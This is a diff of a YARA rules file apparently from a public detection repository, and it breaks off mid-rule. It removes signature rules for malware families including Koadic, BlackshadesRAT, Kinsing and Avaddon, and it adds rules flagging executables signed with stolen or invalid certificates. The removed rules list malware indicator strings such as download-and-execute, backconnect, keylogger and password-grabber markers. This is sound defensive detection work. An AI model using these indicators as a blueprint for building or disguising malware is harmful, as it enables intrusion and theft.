+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" )
 }
-rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Ceb6B2Eec12934A64F75A4592159F084 : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework document payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a37bf0a2-3205-515c-9957-374108e199e9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1160-L1174"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5366-L5377"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7"
+		logic_hash = "3e4aa8d970ead42bf1abb36a922ef31ac1b1aa308944cf099d6bbfb50e07c588"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "&@cls&@set" ascii
-		$s2 = /:~\d+,1%+/ ascii
-		$s3 = "Header Char" fullword wide
-		$s4 = "EMBED Package" ascii
-		$b1 = ".bat\"%" ascii
-		$b2 = ".bat');\\\"%" ascii
-		$b3 = ".bat',%" ascii
+		thumbprint = "ccd30b68e37fc177b754250767a16062a711310a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and all of ( $s* ) and 2 of ( $b* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "ce:b6:b2:ee:c1:29:34:a6:4f:75:a4:59:21:59:f0:84" )
 }
-rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6B6739E55F3F25B147C4A6767De41F57 : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework BAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ee84787b-cc90-545d-8e15-bf84676f222c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1176-L1186"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5379-L5391"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5"
+		hash = "da0921c1e416b3734272dfa619f88c8cd32e9816cdcbeeb81d9e2b2e8a95af4c"
+		logic_hash = "9d1a20f3dfa6c31ed557e531f7a57c64032e518c033993234849882ef769fcbd"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$v1_1 = "&@cls&@set" ascii
-		$v2_1 = { 26 63 6c 73 0d 0a 40 25 }
-		$m1 = /:~\d+,1%+/ ascii
+		thumbprint = "07a09d3d3c05918519d6f357fe7eed5e1d529f22"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfeff and ( ( 1 of ( $v1* ) or 1 of ( $v2* ) ) and #m1 > 100 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avast Antivirus SEC" and pe.signatures [ i ] . serial == "6b:67:39:e5:5f:3f:25:b1:47:c4:a6:76:7d:e4:1f:57" )
 }
-rule DITEKSHEN_MALWARE_JS_Koadicjs
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B97F66Bb221772Dc07Ef1D4Bed8F6085 : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework JS payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8598d5cb-0486-52b0-a686-6bd014f35c44"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "c0797751-d03c-59c7-a02a-27e6f466bd96"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1188-L1208"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5393-L5404"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa"
+		logic_hash = "e68f6ebbeadc9381c2888abf77e040f27648a40d770524830f8a49fe2d11534f"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "window.moveTo(-" ascii
-		$s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii
-		$s3 = "window.onfocus = function() { window.blur(); }" fullword ascii
-		$s4 = "window.resizeTo(" ascii
-		$s5 = "window.blur();" fullword ascii
-		$hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii
-		$hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\""
-		$ht1 = "<hta:application" ascii
-		$ht2 = "caption=\"no\"" ascii
-		$ht3 = "showInTaskBar=\"no\"" ascii
-		$ht4 = "windowState=\"minimize\"" ascii
-		$ht5 = "navigable=\"no\"" ascii
-		$ht6 = "scroll=\"no\"" ascii
+		tags = "FILE"
+		thumbprint = "fb4efb3bfcef8e9a667c8657f2e3c8fb7436666e"
+		importance = 20
 
 	condition:
-		all of ( $s* ) and ( 1 of ( $hf* ) or all of ( $ht* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" )
 }
-rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Cc95D6Ebf18A3711E196Aea210465A19 : FILE
 {
 	meta:
-		description = "NETEAGLE backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bd6957ac-d5e0-5e77-87b3-a62c442f7f72"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1210-L1225"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5406-L5417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510"
+		logic_hash = "640ba6d64ad7e0791ef29d3ee9387e0944826f22f01a6a01486f6b3ac4138826"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
-		$s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
-		$s4 = "/index.htm" fullword ascii
-		$s5 = "Help_ME" fullword ascii
-		$s6 = "GOTO ERROR" ascii
-		$s7 = "127.0.0.1" fullword ascii
-		$s8 = /pic\d\.bmp/ ascii wide
+		thumbprint = "319f0e03f0f230629258c7ea05e7d56ead830ce9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GEN Sistemi, d.o.o." and pe.signatures [ i ] . serial == "00:cc:95:d6:eb:f1:8a:37:11:e1:96:ae:a2:10:46:5a:19" )
 }
-rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dde89C647Dc2138244228040E324Dc77 : FILE
 {
 	meta:
-		description = "BACKSPACE backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5008d334-964a-516b-895e-761ae94e5bd4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1227-L1247"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5419-L5430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121"
+		logic_hash = "d6c11a277f855ad8a4b235e1461ad024c4490d04530b91ecb47c8fcf8dee1239"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\PnpSetup" ascii wide
-		$s2 = "Mutex_lnkword_little" ascii wide
-		$s3 = "(Prxy%c-%s:%u)" fullword ascii
-		$s4 = "(Prxy-No)" fullword ascii
-		$s5 = "/index.htm" fullword ascii
-		$s6 = "CONNECT %s:%d" ascii
-		$s7 = "\\$NtRecDoc$" fullword ascii
-		$s8 = "qazWSX123$%^" ascii
-		$s9 = "Software\\Microsoft\\Core" ascii wide
-		$s10 = "Mutex_lnkch" ascii wide
-		$s11 = "Event__lnkch__" ascii wide
-		$s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii
-		$s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii
+		thumbprint = "1d9aaa1bc7d6fc5a76295dd1cf692fe4a1283f04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "dd:e8:9c:64:7d:c2:13:82:44:22:80:40:e3:24:dc:77" )
 }
-rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : FILE
 {
 	meta:
-		description = "RHttpCtrl backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8f7d0337-7840-5c6e-b562-dbaef1a7c022"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1249-L1265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5432-L5443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1"
+		logic_hash = "26690cb1ef7eb9b7009376b4c2a30505f01184f4462478f65379372e84e02bc8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii
-		$s2 = "ver=%s&id=%06d&type=" ascii
-		$s3 = "ver=%d&id=%s&random=%d&" ascii
-		$s4 = "id=%d&output=%s" ascii
-		$s5 = "Error:WinHttpCrackUrl failed!/n" ascii
-		$s6 = "Error:SendRequest failed!/n" ascii
-		$s7 = ".exe a %s %s" ascii
-		$s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide
-		$pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii
+		thumbprint = "4bc67aca336287ff574978ef3bf67c688f6449f2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" )
 }
-rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4E7545C9Fc5938F5198Ab9F1749Ca31C : FILE
 {
 	meta:
-		description = "PillowMint POS payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "af27fbf7-f4e2-59e9-8b2b-b353704ce9d6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1267-L1283"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5445-L5456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a"
+		logic_hash = "4b7bc07622ad3f7ec77f4bb0d51350c82734af4b73a26ecd21955e55e99bb515"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "system32\\sysvols\\" ascii nocase
-		$s2 = "Sysnative\\sysvols\\" ascii nocase
-		$s3 = "critical.log" fullword ascii
-		$s4 = "log.log" fullword ascii
-		$s5 = "commands.txt" fullword ascii
-		$s6 = "_EV0LuTi0N_" ascii
-		$s7 = /(file|reg)\scmd:/ fullword ascii
-		$s8 = "dumper_nologs_" ascii
-		$s9 = "ReflectiveLoader" ascii
+		thumbprint = "7a49677c535a13d0a9b6deb539d084ff431a5b54"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_040F11F124A73Bdecc41259845A8A773 : FILE
 {
 	meta:
-		description = "BlackshadesRAT / Cambot POS payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bd0ad920-109a-50b5-94af-6580684bff52"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0502773a-356e-5eae-9c37-e1ef89de3547"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1285-L1300"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5458-L5469"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2"
+		logic_hash = "70edbe8be481ccb7b5c6a6485c2ac249ec5120a4cde18d551954cfeaae121f27"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920208-920210"
-
-	strings:
-		$s1 = "bhookpl.dll" fullword wide
-		$s2 = "drvloadn.dll" fullword wide
-		$s3 = "drvloadx.dll" fullword wide
-		$s4 = "SPY_NET_RATMUTEX" fullword wide
-		$s5 = "\\dump.txt" fullword wide
-		$s6 = "AUTHLOADERDEFAULT" fullword wide
-		$pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide
+		thumbprint = "6f332f7e78cac4a6c35209fde248ef317f7a23e8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TrustPort" and pe.signatures [ i ] . serial == "04:0f:11:f1:24:a7:3b:de:cc:41:25:98:45:a8:a7:73" )
 }
-rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1B1E87E90519D7273C0033Bf489B798F : FILE
 {
 	meta:
-		description = "GoldenSpy dropper payload"
-		author = "SpiderLabs Trustwave"
-		id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1302-L1314"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "b154ae08-108c-5980-a611-5e086877af2a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5471-L5483"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa"
+		hash = "84cef0aed269e6213bfa213d95a3db625bcdde130f33bf4227436985e4473252"
+		logic_hash = "b47f80ecc895e73d69c60a5e88d6a6c95fcb9bddb30f14a1421b68aabc2290c9"
 		score = 75
-		quality = 67
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$reg = "Software\\IDG\\DA" nocase wide ascii
-		$str1 = "requestStr" nocase wide ascii
-		$str2 = "nb_app_log_mutex" nocase wide ascii
-		$str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 }
+		thumbprint = "ef09824554f85603c9ffb1cecbfe06ae489a9583"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and $reg and 2 of ( $str* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBIS, OOO" and pe.signatures [ i ] . serial == "1b:1e:87:e9:05:19:d7:27:3c:00:33:bf:48:9b:79:8f" )
 }
-rule DITEKSHEN_MALWARE_Win_Plurox : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D9E834182Dec62C654E775E809Ac1D1B : FILE
 {
 	meta:
-		description = "Plurox backdoor payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c8a97132-c1d5-5456-a055-d46a9399dbdd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ce1640b7-6631-5e8f-a2df-0716b2f86b99"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1316-L1328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5485-L5497"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1"
+		hash = "645dbb6df97018fafb4285dc18ea374c721c86349cb75494c7d63d6a6afc27e6"
+		logic_hash = "3e7ca9aec19f118c7a143826838244f3f8d0a603a44980522f5227a9c3a82a88"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "autorun.c" fullword ascii
-		$s2 = "launcher.c" fullword ascii
-		$s3 = "loader.c" fullword ascii
-		$s4 = "stealth.c" fullword ascii
-		$s5 = "RunFromMemory" fullword ascii
+		thumbprint = "5bb983693823dbefa292c86d93b92a49ec6f9b26"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" )
 }
-rule DITEKSHEN_MALWARE_Win_Avalon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ced87Bd70B092Cb93B182Fac32655F6 : FILE
 {
 	meta:
-		description = "Avalon infostealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3de01419-9f45-5d82-8391-2e1e41df2b34"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5e716e70-0c78-5194-9134-0ee140221610"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1330-L1359"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5499-L5511"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713"
+		hash = "083d5efb4da09432a206cb7fba5cef2c82dd6cc080015fe69c2b36e71bca6c89"
+		logic_hash = "3d4d84a60095e608fbd774f2b3a0f86e32dd9fe25801da06ee10188425a029e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Parsecards" fullword ascii
-		$s2 = "Please_Gofuckyouself" fullword ascii
-		$s3 = "GetDomainDetect" fullword ascii
-		$s4 = "GetTotalCommander" fullword ascii
-		$s5 = "KnownFolder" fullword ascii
-		$s6 = "set_hidden" fullword ascii
-		$s7 = "set_system" fullword ascii
-		$l1 = "\\DomainDetect.txt" wide
-		$l2 = "\\Grabber_Log.txt" wide
-		$l3 = "\\Programs.txt" wide
-		$l4 = "\\Passwords_Edge.txt" wide
-		$l5 = "\\KL.txt" wide
-		$w1 = "dont touch" fullword wide
-		$w2 = "Grabber" fullword wide
-		$w3 = "Keylogger" fullword wide
-		$w4 = "password-check" fullword wide
-		$w5 = "H4sIAAAAAAAEA" wide
-		$p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
-		$p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
+		thumbprint = "97b7602ed71480756cf6e4658a107f8278a48096"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" )
 }
-rule DITEKSHEN_MALWARE_Linux_Kinsing : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Afd1491D52F89Ba41Fa6C0281Bb9716 : FILE
 {
 	meta:
-		description = "Kinsing RAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a0e5569f-7895-519b-9c1b-9cea3126391f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1361-L1376"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5513-L5524"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc"
+		logic_hash = "071895cc37527aa634410dc79bf1656068e4c2b9f61d24912160c5f847e154f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "backconnect" ascii
-		$s2 = "connectForSocks" ascii
-		$s3 = "downloadAndExecute" ascii
-		$s4 = "download_and_exec" ascii
-		$s5 = "masscan" ascii
-		$s6 = "UpdateCommand:" ascii
-		$s7 = "exec_out" ascii
-		$s8 = "doTask with type %s" ascii
+		thumbprint = "e4362228dd69c25c1d4ba528549fa00845a8dc24"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TestCert" and pe.signatures [ i ] . serial == "1a:fd:14:91:d5:2f:89:ba:41:fa:6c:02:81:bb:97:16" )
 }
-rule DITEKSHEN_MALWARE_Win_Avaddon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_719Ac44966D05762Ef95245Eefcf3046 : FILE
 {
 	meta:
-		description = "Avaddon ransomware payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d5618c8a-17b7-5009-9947-a6462ad2a4af"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e215971c-67f0-5fdb-9525-7aef2559674f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1378-L1395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5526-L5537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc3032572d2ab2550d3dde738a3d403459da9b5b640acc814596d958b83620bf"
+		logic_hash = "2b7c5ccc7a09d3917cf8625bc3e78526ba9620eb8bb08490124c24a5c2eda629"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\IMAGEM~1.%d\\VISUA~1\\BIN\\%s.exe" ascii
-		$s2 = "\\IMAGEM~1.%.2d-\\VISUA~1\\BIN\\%s.exe" ascii
-		$s3 = "\\IMAGEM~1.%d-Q\\VISUA~1\\BIN\\%s.exe" ascii
-		$s4 = "\\IMAGEM~1.%d\\%s.exe" ascii
-		$s5 = "EW6]>mFXDS?YBi?W5] CY 4Z8Y BY7Y BZ8Z CY7Y AY8Z CZ8Y!Y:Z" ascii
-		$s6 = "FY  AY 'Z      ;W      @Y  @Y 'Z    Y  @Y (Z" ascii
-		$s7 = "\"rcid\":\"" fullword ascii
-		$s8 = "\"ip\":\"" fullword ascii wide
-		$s9 = ".?AUANEventIsGetExternalIP@@" fullword ascii
-		$s10 = ".?AUANEventGetCpuMax@@" fullword ascii
+		thumbprint = "57ecdfa48ed03a5a8177887090b3d1ffaf124846"
+		importance = 20
 
 	condition:
